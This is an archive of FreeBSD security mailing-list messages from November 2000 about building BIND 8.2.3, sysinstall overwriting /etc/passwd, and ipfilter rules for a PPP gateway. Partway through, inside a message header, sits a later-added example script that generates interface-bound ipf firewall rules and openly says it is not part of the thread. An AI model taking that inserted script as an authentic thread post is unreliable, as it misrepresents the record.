3.5 -> 4.x, mainly because of the mess it will probably be to clean out old binaries and so forth, and like I said, downtime on this machine is a huge no-no. The only way I'd ever consider it is to format and install 4.x clean, then dump the user info back from tape, but that would take too long.. 
:) * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE6EsmvdMMtMcA1U5ARAgOPAKC+XuIxgDjutB4HM1xBqABQpKCrEQCZAaUF vhtBk5W7djbbYdiAd+O8hgA= =L0xM -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 10:38:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 43B3037B4E5 for ; Wed, 15 Nov 2000 10:38:24 -0800 (PST) Received: (qmail 60875 invoked by uid 1000); 15 Nov 2000 18:38:23 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 15 Nov 2000 18:38:23 -0000 Date: Wed, 15 Nov 2000 12:38:23 -0600 (CST) 
From: Mike Silbersack To: Matt Heckaman Cc: Cy Schubert - ITSD Open Systems Group , Kris Kennaway , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 15 Nov 2000, Matt Heckaman wrote: > On Wed, 15 Nov 2000, Cy Schubert - ITSD Open Systems Group wrote: > ... > : You must be running an old version of 4.x. Bind 8.2.3-T5B was merged > : into -stable on Jul 3, 2000 and 8.2.3-T6B as MFCed on Nov 2. > > Not quite :) > > I have two machines on 4.1.1-RELEASE, which are new and were installed as > 4.0 originally then upgraded to 4.1.1-RELEASE. The holdback server is > 3.5-STABLE and I simply can't afford to take it down for an upgrade. I'm > not comfortable doing a make world upgrade on 3.5 -> 4.x, mainly because > of the mess it will probably be to clean out old binaries and so forth, > and like I said, downtime on this machine is a huge no-no. The only way > I'd ever consider it is to format and install 4.x clean, then dump the > user info back from tape, but that would take too long.. :) > > * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * > * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * Well, as I recall, BIND builds pretty easily on FreeBSD. You could always manually build 8.2.3-T6B if you need it. 
Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 10:43:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 454C037B479 for ; Wed, 15 Nov 2000 10:43:12 -0800 (PST) Received: (qmail 39481 invoked by uid 1001); 15 Nov 2000 18:43:10 +0000 (GMT) To: silby@silby.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) 
From: sthaug@nethelp.no In-Reply-To: Your message of "Wed, 15 Nov 2000 12:38:23 -0600 (CST)" References: X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Wed, 15 Nov 2000 19:43:09 +0100 Message-ID: <39479.974313789@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Well, as I recall, BIND builds pretty easily on FreeBSD. You could always > manually build 8.2.3-T6B if you need it. Extremely easy. As in "make clean; make depend; make". Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 10:54:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 2062337B4C5; Wed, 15 Nov 2000 10:54:24 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA27785; Wed, 15 Nov 2000 10:54:23 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda27783; Wed Nov 15 10:54:20 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eAFIsE012778; Wed, 15 Nov 2000 10:54:14 -0800 (PST) Message-Id: <200011151854.eAFIsE012778@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdC12498; Wed Nov 15 10:53:17 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cschuber To: Mike Silbersack Cc: Matt Heckaman , Cy Schubert - ITSD Open Systems Group , Kris Kennaway , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-reply-to: Your message of "Wed, 15 Nov 2000 12:38:23 CST." 
Date: Wed, 15 Nov 2000 10:53:16 -0800 
From: Cy Schubert Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In message , Mike Silbersack writes:
>
> On Wed, 15 Nov 2000, Matt Heckaman wrote:
>
> > On Wed, 15 Nov 2000, Cy Schubert - ITSD Open Systems Group wrote:
> > ...
> > : You must be running an old version of 4.x. Bind 8.2.3-T5B was merged
> > : into -stable on Jul 3, 2000 and 8.2.3-T6B as MFCed on Nov 2.
> >
> > Not quite :)
> >
> > I have two machines on 4.1.1-RELEASE, which are new and were installed as
> > 4.0 originally then upgraded to 4.1.1-RELEASE. The holdback server is
> > 3.5-STABLE and I simply can't afford to take it down for an upgrade. I'm
> > not comfortable doing a make world upgrade on 3.5 -> 4.x, mainly because
> > of the mess it will probably be to clean out old binaries and so forth,
> > and like I said, downtime on this machine is a huge no-no. The only way
> > I'd ever consider it is to format and install 4.x clean, then dump the
> > user info back from tape, but that would take too long.. :)
>
> Well, as I recall, BIND builds pretty easily on FreeBSD. You could always
> manually build 8.2.3-T6B if you need it.

Or, creating a local port from the bind8 port in /usr/ports is simple. Just update Makefile, distinfo, and if the patches don't apply, spend 1/2 hour fixing them up so they do. Then do a diff -urPN and submit the patches as a PR.
Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 11:34: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id D333E37B4D7 for ; Wed, 15 Nov 2000 11:33:58 -0800 (PST) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id NAA25955; Wed, 15 Nov 2000 13:32:52 -0600 (CST) (envelope-from jeff-ml@mountin.net) Received: from dial-110.max1.wa.cyberlynk.net(207.227.118.110) by peak.mountin.net via smap (V1.3) id sma025953; Wed Nov 15 13:32:29 2000 Message-Id: <4.3.2.20001115132537.00aa5890@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Version 4.3 Date: Wed, 15 Nov 2000 13:31:56 -0600 To: Domas Mituzas , Cy Schubert - ITSD Open Systems Group 
From: "Jeffrey J. Mountin" Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <200011151528.eAFFSL152822@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 05:57 PM 11/15/00 +0200, Domas Mituzas wrote: > > You must be running an old version of 4.x. Bind 8.2.3-T5B was merged > > into -stable on Jul 3, 2000 and 8.2.3-T6B as MFCed on Nov 2. > > >Try to read that email again ;-) 8.2.3 in ports should be for guys using >3.x (and even 2.2.x ;-) Ah but 2.2.x has not been supported by ports for a while and 3.x support is fuzzy. Not to start another debate on what ports *should* support (check the archives, as it has been hashed over again and again), but sticking with only current (5.0) and stable (4.x) makes life easier on the port maintainers. Thus with 8.2.3 in the base for these branches there will not be a port. Unless you can convince them to. ;) Besides, it has been pointed out that it builds easily out-of-the-box. Jeff Mountin - jeff@mountin.net Systems/Network Administrator FreeBSD - the power to serve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 11:54:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.sageian.com (ns.sage-consult.com [208.201.118.11]) by hub.freebsd.org (Postfix) with ESMTP id F0CF037B479 for ; Wed, 15 Nov 2000 11:54:40 -0800 (PST) Received: from pricli012 (proxy.sageian.com [208.201.118.126]) by mail.sageian.com (Postfix) with SMTP id 4CDE76A92B for ; Wed, 15 Nov 2000 14:54:39 -0500 (EST) Message-ID: <003f01c04f3e$3c77e170$4c00000a@sage> Reply-To: "Rossen Raykov" 
From: "Rossen Raykov" To: References: Subject: problem using sysinstall Date: Wed, 15 Nov 2000 14:57:08 -0500 Organization: SageConsult, Princeton MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hi,

I've received strange results after using sysinstall on 4.1.1-RELEASE FreeBSD.

On a preinstalled system I start /stand/sysinstall. From the menu I select "Configure" -> "Distributions". I select only bin from the distributions and start the install from the primary ftp server. Everything was fine except that I started the installation remotely (through a firewall) and at some point after the transfer finished my ssh connection timed out and I lost the connection with the server. I assume that the bin (re)installation finished fine.

An hour later I went into the server room where the box is and tried to log in as root. To my surprise the system didn't prompt me for a password but gave me the root command prompt?! This of course was not all. When I looked at /etc/passwd it was a completely new one! The root was without a password, the root alias toor was with * for a password and without a shell! All other user accounts were missing!

I put a password on root and toor and tried to log in as toor. The result was that I received the root command prompt even though the account was without a shell in /etc/passwd?! The shell that I received was /bin/sh.

My question is: is it normal to achieve such results after this action? Is the sysinstall behavior correct? Why were there no warnings about changes in /etc/passwd? Is the behavior of the toor alias normal? I believe the answer to all these questions is NO! If that is true then what did I do wrong?
My sysinstall options are:

                                  Options Editor

Name              Value                     Name              Value
----              -----                     ----              -----
NFS Secure        NO                        Media Timeout     300
NFS Slow          NO                        Package Temp      /usr/tmp
Debugging         NO                        Newfs Args        -b 8192 -f 1024
No Warnings       NO                        Config save       YES
Yes to All        NO                        Re-scan Devices   <*>
DHCP              NO                        Use Defaults      [RESET!]
FTP username      ftp                       Editor            /usr/bin/ee
Tape Blocksize    20                        Extract Detail    high
Release Name      4.1.1-RELEASE             Install Root      /
Browser package   lynx                      Browser Exec      /usr/local/bin/lynx
Media Type

Use SPACE to select/toggle an option, arrow keys to move,
? or F1 for more help.  When you're done, type Q to Quit.

Please send a copy to my e-mail address since I'm not on the list.

Regards,
Rossen Raykov

From owner-freebsd-security Wed Nov 15 12:22:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id E9D8737B4E5 for ; Wed, 15 Nov 2000 12:22:08 -0800 (PST) Received: (qmail 28360 invoked by uid 0); 15 Nov 2000 20:16:05 -0000 Received: from p3ee20a99.dip.t-dialin.net (HELO speedy.gsinet) (62.226.10.153) by mail.gmx.net (mail04) with SMTP; 15 Nov 2000 20:16:05 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id TAA02442 for freebsd-security@FreeBSD.ORG; Wed, 15 Nov 2000 19:22:59 +0100 Date: Wed, 15 Nov 2000 19:22:59 +0100
From: Gerhard Sittig To: freebsd-security@FreeBSD.ORG Subject: Re: PPP NAT Gateway security Message-ID: <20001115192259.Q27042@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <00c801c04dc4$12a89220$0200a8c0@n2> <20001114144513.A888@grok> <001c01c04e97$c69c3c90$0200a8c0@n2> <20001114211934.B888@grok> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001114211934.B888@grok>; from sreid@sea-to-sky.net on Tue, Nov 14, 2000 at 09:19:34PM -0800 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Tue, Nov 14, 2000 at 21:19 -0800, Steve Reid wrote:
> On Wed, Nov 15, 2000 at 12:05:28AM -0000, Nuno Teixeira wrote:
> >
> > [ ... dynamic IP ... ]
>
> This is what I've whipped up for my ipfilter config:
>
> http://sea-to-sky.net/~sreid/ipfinit
> A simple little sh script that takes an interface name (fxp0 in
> my case, tun0 in yours) as an argument and extracts the IP
> address information from ifconfig, then performs the
> appropriate substitutions on ipf.cfg and feeds the results to
> ipf.

I haven't looked at your doc (yet), but I suddenly felt like replying. :)

ipf already has a feature like ppp's MYADDR -- specify 0.0.0.0/32 as the IP and issue "ipf -y" when interface configuration changes (like in ppp.linkup or in the appropriate dhcp client hooks).

And BTW: You do bind your rules to interfaces ("... on $IF") already, don't you? If not, I wouldn't like to ignore where certain packets come in from or want to leave the machine at ...

If it's just for variable substitution or conditional "compilation", you might find my patch described in http://www.freebsd.org/cgi/query-pr.cgi?pr=21989 of interest.

> To use the above, add "options IPFILTER" to your kernel config.

And one better adds IPFILTER_LOG as well as IPFILTER_DEFAULT_BLOCK to the kernel config before getting used to living without it. :)

And since JKH was so kind to MFC the PR 20202 patch, ipf would even come up at boot time beginning with the 4.2-RELEASE if the admin wants it to. There's nothing more to it than throwing a little lever in rc.conf (a real life example is given in "man 5 rc.conf").

virtually yours   82D1 9B9C 01DC 4FB4 D7B4  61BE 3F49 4F77 72DE DA76
Gerhard Sittig    true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
     If you don't understand or are scared by any of the above
             ask your parents or an adult to help you.

From owner-freebsd-security Wed Nov 15 12:50:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id AA33337B479 for ; Wed, 15 Nov 2000 12:50:39 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAFKpnc21358; Wed, 15 Nov 2000 12:51:49 -0800 (PST) (envelope-from kris) Date: Wed, 15 Nov 2000 12:51:48 -0800
From: Kris Kennaway To: Rossen Raykov Cc: security@FreeBSD.ORG Subject: Re: problem using sysinstall Message-ID: <20001115125148.A21232@citusc17.usc.edu> References: <003f01c04f3e$3c77e170$4c00000a@sage> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="d6Gm4EdcadzBjdND" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <003f01c04f3e$3c77e170$4c00000a@sage>; from rraykov@sageian.com on Wed, Nov 15, 2000 at 02:57:08PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --d6Gm4EdcadzBjdND Content-Type: text/plain; charset=us-ascii Content-Disposition: inline

On Wed, Nov 15, 2000 at 02:57:08PM -0500, Rossen Raykov wrote:

> My question is : is it normal to achieve such a results after this action?
> Is the sysinstall behavior correct? Why there ware no warnings about changes
> in /etc/passwd?
> Is it normal the behavior on toor alias?

Installing the bin distribution overwrites /etc (along with overwriting all other parts of the base system, like you asked it to).

Live remote upgrades of a running system like this are dangerous for that reason. I did think sysinstall prompted for a root password, though. Even so, since you're installing on a multi-user system with logins enabled during the upgrade there's still a race condition before the password file is updated.
Don't do that :-) Kris --d6Gm4EdcadzBjdND Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoS92MACgkQWry0BWjoQKWnfgCguTF8SxmplZ9yx1flNgQe8N38 fxkAmwdjwwAwoB4raLlocc+UwIfmujJT =WJ3o -----END PGP SIGNATURE----- --d6Gm4EdcadzBjdND-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 12:55: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from grok.example.net (cr479972-a.rct1.bc.wave.home.com [24.113.37.168]) by hub.freebsd.org (Postfix) with ESMTP id 443FD37B479 for ; Wed, 15 Nov 2000 12:55:05 -0800 (PST) Received: by grok.example.net (Postfix, from userid 1000) id 9B81A21314D; Wed, 15 Nov 2000 12:55:04 -0800 (PST) Date: Wed, 15 Nov 2000 12:55:04 -0800 
From: Steve Reid To: Gerhard Sittig Cc: freebsd-security@FreeBSD.ORG Subject: Re: PPP NAT Gateway security Message-ID: <20001115125504.Q3759@grok> References: <00c801c04dc4$12a89220$0200a8c0@n2> <20001114144513.A888@grok> <001c01c04e97$c69c3c90$0200a8c0@n2> <20001114211934.B888@grok> <20001115192259.Q27042@speedy.gsinet> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <20001115192259.Q27042@speedy.gsinet>; from Gerhard Sittig on Wed, Nov 15, 2000 at 07:22:59PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Wed, Nov 15, 2000 at 07:22:59PM +0100, Gerhard Sittig wrote:
> ipf already has a feature like ppp's MYADDR -- specify 0.0.0.0/32
> as the IP and issue "ipf -y" when interface configuration changes

I can't get this to work with stock ipf in 4.1-R (ipf v3.4.8). Nothing gets through. Is 0.0.0.0/32 a recent addition, or is it or the operator just broken in 4.1-R?

> And BTW: You do bind your rules to interfaces ("... on $IF")
> already, don't you?

Of course.

> If it's just for variable substitution or conditional
> "compilation", you might find my patch described in
> http://www.freebsd.org/cgi/query-pr.cgi?pr=21989 of interest.

I thought I saw that mentioned somewhere. I haven't bothered upgrading ipf though, as all the preprocessing I need can be done in a few lines of shell script.

From owner-freebsd-security Wed Nov 15 13:11:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 81FCC37B4FE; Wed, 15 Nov 2000 13:11:07 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAFLCQ521776; Wed, 15 Nov 2000 13:12:26 -0800 (PST) (envelope-from kris) Date: Wed, 15 Nov 2000 13:12:26 -0800
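The approach Steve describes (read the interface's current address out of ifconfig, substitute it into a rule template, feed the result to ipf) together with Gerhard's two points (bind every rule to its interface with "on $IF", and start from a default-block posture with logging) can be sketched as follows. This is an added example written for this page, not Steve's ipfinit script from sea-to-sky.net and not part of the thread: the interface name tun0, the 203.0.113.x addresses, the ifconfig output and the rules themselves are constructed for the example. Because Steve found 0.0.0.0/32 not working in his ipf, the script substitutes the real address rather than relying on that feature.

```shell
#!/bin/sh
# Added example: regenerate an interface-bound ipf ruleset from the
# interface's current address, then load it.  The ifconfig output below
# is constructed for the example, not captured from a real host.

SAMPLE_IFCONFIG='tun0: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1500
        inet 203.0.113.17 --> 203.0.113.1 netmask 0xffffffff'

# Print the first IPv4 address found in ifconfig output read on stdin.
extract_inet() {
    awk '$1 == "inet" { print $2; exit }'
}

# Emit the ruleset for interface $1 whose current address is $2.
# Every rule names the interface; the default is block (and log), the
# passes are explicit and stateful, and the only inbound service is ssh.
render_rules() {
    rif=$1
    rip=$2
    cat <<EOF
# ipf rules generated for $rif ($rip)
block in log on $rif all
block out log on $rif all
block in log quick on $rif from $rip/32 to any
block in quick on $rif from 10.0.0.0/8 to any
block in quick on $rif from 172.16.0.0/12 to any
block in quick on $rif from 192.168.0.0/16 to any
pass out quick on $rif proto tcp from $rip/32 to any flags S keep state
pass out quick on $rif proto udp from $rip/32 to any keep state
pass out quick on $rif proto icmp from $rip/32 to any keep state
pass in quick on $rif proto tcp from any to $rip/32 port = 22 flags S keep state
EOF
}

# Hook body for ppp.linkup or a dhclient script: rebuild and load the
# rules whenever the interface's address changes.  "ipf -Fa" flushes the
# active ruleset and "-f -" reads the new one from stdin.
reload_rules() {
    addr=$(ifconfig "$1" | extract_inet)
    if [ -z "$addr" ]; then
        echo "reload_rules: no inet address on $1" >&2
        return 1
    fi
    render_rules "$1" "$addr" | ipf -Fa -f -
}

# Stand-alone demonstration on the constructed ifconfig output.
demo_addr=$(printf '%s\n' "$SAMPLE_IFCONFIG" | extract_inet)
render_rules tun0 "$demo_addr"
```

The third block rule drops packets arriving on the external interface that claim to come from the machine's own address, which is the main thing that silently stops working if the address changes and the rules are not regenerated. Loading with a flush-then-load leaves a gap of a few milliseconds with no rules; on a default-block kernel (IPFILTER_DEFAULT_BLOCK, as Gerhard suggests) that gap fails closed rather than open.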
From: Kris Kennaway To: Kris Kennaway Cc: Rossen Raykov , security@FreeBSD.ORG Subject: Re: problem using sysinstall Message-ID: <20001115131226.A21677@citusc17.usc.edu> References: <003f01c04f3e$3c77e170$4c00000a@sage> <20001115125148.A21232@citusc17.usc.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="IJpNTDwzlM2Ie8A6" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001115125148.A21232@citusc17.usc.edu>; from kris@FreeBSD.ORG on Wed, Nov 15, 2000 at 12:51:48PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --IJpNTDwzlM2Ie8A6 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable

On Wed, Nov 15, 2000 at 12:51:48PM -0800, Kris Kennaway wrote:
> On Wed, Nov 15, 2000 at 02:57:08PM -0500, Rossen Raykov wrote:
>
> > My question is : is it normal to achieve such a results after this action?
> > Is the sysinstall behavior correct? Why there ware no warnings about changes
> > in /etc/passwd?
> > Is it normal the behavior on toor alias?
>
> Installing the bin distribution overwrites /etc (along with
> overwriting all other parts of the base system, like you asked it to).
>
> Live remote upgrades of a running system like this are dangerous for
> that reason. I did think sysinstall prompted for a root password,
> though. Even so, since you're installing on a multi-user system with

I overlooked the fact that your ssh connection was disconnected before the upgrade finished - I assume this explains why you weren't prompted, since sysinstall was terminated when you disconnected. However my previous note about the race condition still stands. There's not much which can be done about this - basically, you should be only doing OS upgrade work on a single-user box via the console or serial console.

Kris

P.S. Why are you allowing remote root logins, anyway?
--IJpNTDwzlM2Ie8A6 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoS/DoACgkQWry0BWjoQKUt/QCfVKweHoN8kMPR/CpxWALRpKP2 HHgAoOXaD467O0woTVkMgq5iAOOBG+nJ =18jm -----END PGP SIGNATURE----- --IJpNTDwzlM2Ie8A6-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 13:46:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.sageian.com (ns.sage-consult.com [208.201.118.11]) by hub.freebsd.org (Postfix) with ESMTP id B322C37B479; Wed, 15 Nov 2000 13:46:54 -0800 (PST) Received: from pricli012 (proxy.sageian.com [208.201.118.126]) by mail.sageian.com (Postfix) with SMTP id 7583E6A904; Wed, 15 Nov 2000 16:46:53 -0500 (EST) Message-ID: <00d301c04f4d$e9802760$4c00000a@sage> Reply-To: "Rossen Raykov" 
From: "Rossen Raykov"
References: <003f01c04f3e$3c77e170$4c00000a@sage> <20001115125148.A21232@citusc17.usc.edu> <20001115131226.A21677@citusc17.usc.edu>
Subject: Re: problem using sysinstall
Date: Wed, 15 Nov 2000 16:49:21 -0500
Organization: SageConsult, Princeton

Hi,

I'm not allowing remote root login anywhere!
I'm doing ssh admin_user_name followed by su to root from this account.

I'm curious for the answer to my second question:
Is it normal to receive the command prompt for an account without a shell
in /etc/passwd?

Also there were lots of bugs in the bin distribution - top, telnet ... is
there a way/tool to reinstall those binaries remotely?
It will be fine if all binaries are reinstalled.
Why would someone do that? Imagine a firewall on which you would not like
to support any development tools. How will you upgrade the binaries if you
don't have at least one more box with the same OS?

Thanks,
Rossen

----- Original Message -----
Sent: Wednesday, November 15, 2000 4:12 PM
Subject: Re: problem using sysinstall

From owner-freebsd-security Wed Nov 15 13:48:46 2000
Date: Wed, 15 Nov 2000 16:48:39 -0500 (EST)
From: Igor Roshchin
Message-Id: <200011152148.QAA88899@giganda.komkon.org>
To: kris@FreeBSD.ORG
Subject: Re: problem using sysinstall
Cc: rraykov@sageian.com, security@FreeBSD.ORG
In-Reply-To: <20001115131226.A21677@citusc17.usc.edu>

> Date: Wed, 15 Nov 2000 13:12:26 -0800
> From: Kris Kennaway
> To: Kris Kennaway
> Cc: Rossen Raykov, security@FreeBSD.ORG
> Subject: Re: problem using sysinstall
> <..>
> > Installing the bin distribution overwrites /etc (along with
> > overwriting all other parts of the base system, like you asked it to).
> >
> > Live remote upgrades of a running system like this are dangerous for
> > that reason. I did think sysinstall prompted for a root password,
> > though. Even so, since you're installing on a multi-user system with
>
> I overlooked the fact that your ssh connection was disconnected before
> the upgrade finished - I assume this explains why you weren't
> prompted, since sysinstall was terminated when you
> disconnected. However my previous note about the race condition still
> stands.
>
> There's not much which can be done about this - basically, you should
> be only doing OS upgrade work on a single-user box via the console or
> serial console.
>
> Kris
>
> P.S. Why are you allowing remote root logins, anyway?

Well, although we all understand what is "The Good Thing",
the reality of life makes us make some compromises.
I believe several (I would even say `many') people on this list have done
upgrades (either via "make world" or via sysinstall) a) remotely b) in
multiuser mode. There are multiple reasons (colocation box, box at a
client's site, ...); it's not a question to argue about, that's the reality
of life. In some cases one just doesn't have the luxury of having a serial
console attached to some other computer or a modem.

What can be done about it?

1. Obvious way: Make a statement "This is a BAD thing", so if you do it,
it's your problem. (I am not criticizing or flaming anybody here.)

2. Maybe keep such possibilities (multiuser-mode upgrade) in mind when
working on programs like "sysinstall" and the Makefile "install" tag, and
I think so far it was the case.
(Well, I know, sysinstall is already complicated enough, and it's all
"patched" on top of what was a temporary "hack", and the new sysinstall
might be coming up soon). Well, a note "do it at your own risk" can still
be attached to it.

Over the years the sysinstall functionality has been improved dramatically,
providing several new options which somebody in 199[34] would consider an
unnecessary luxury.

I should admit, every time I hit the "enter" key to do a remote upgrade I
am worrying whether it will come up again smoothly... Usually it does. Very
seldom the system didn't come up smoothly, but then it was an error on my
part, when I was forgetting to do some changes and checks. I even created
my own "check list" for upgrades like that.
(hint, hint: I might be missing it and it exists somewhere in the FAQ or
the handbook; if so, I apologize, but a nice, concise check list can be
helpful to many people).

As for the root logins - sometimes, when I do my remote upgrades, or need
to unmount/remount/check some disks, I open remote root logins via ssh.
This allows me to kick out all users and unmount the partition with home
directories, and also keep all users from logging in simply with
"/etc/nologin".

Igor

From owner-freebsd-security Wed Nov 15 13:52:18 2000
Date: Wed, 15 Nov 2000 13:53:32 -0800
From: Kris Kennaway
To: Rossen Raykov
Cc: kris@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: problem using sysinstall
Message-ID: <20001115135331.A22524@citusc17.usc.edu>
References: <003f01c04f3e$3c77e170$4c00000a@sage> <20001115125148.A21232@citusc17.usc.edu> <20001115131226.A21677@citusc17.usc.edu> <00d301c04f4d$e9802760$4c00000a@sage>
In-Reply-To: <00d301c04f4d$e9802760$4c00000a@sage>; from rraykov@sageian.com on Wed, Nov 15, 2000 at 04:49:21PM -0500

On Wed, Nov 15, 2000 at 04:49:21PM -0500, Rossen Raykov wrote:
> Hi,
>
> I'm not allowing remote root login anywhere!
> I'm doing ssh admin_user_name followed by su to root from this account.

OK.

> I'm curious for the answer to my second question:
> Is it normal to receive the command prompt for an account without a shell in
> /etc/passwd?

The shell must be listed in /etc/shells.

> Also there were lots of bugs in the bin distribution - top, telnet ... is
> there a way/tool to reinstall those binaries remotely?
> It will be fine if all binaries are reinstalled.

Binary patches aren't currently produced - there are difficulties in
creating and maintaining such a system which no-one has overcome yet.
Rebuild the utility from source on another machine and copy it over.

> How will you upgrade the binaries if you don't have at least one more box
> with the same OS?

You can't, easily. However upgrading to a -stable snapshot after the
problem has been fixed will cover it.

Kris

From owner-freebsd-security Wed Nov 15 13:58:50 2000
Date: Wed, 15 Nov 2000 14:00:02 -0800
From: Kris Kennaway
To: Igor Roshchin
Cc: kris@FreeBSD.ORG, rraykov@sageian.com, security@FreeBSD.ORG
Subject: Re: problem using sysinstall
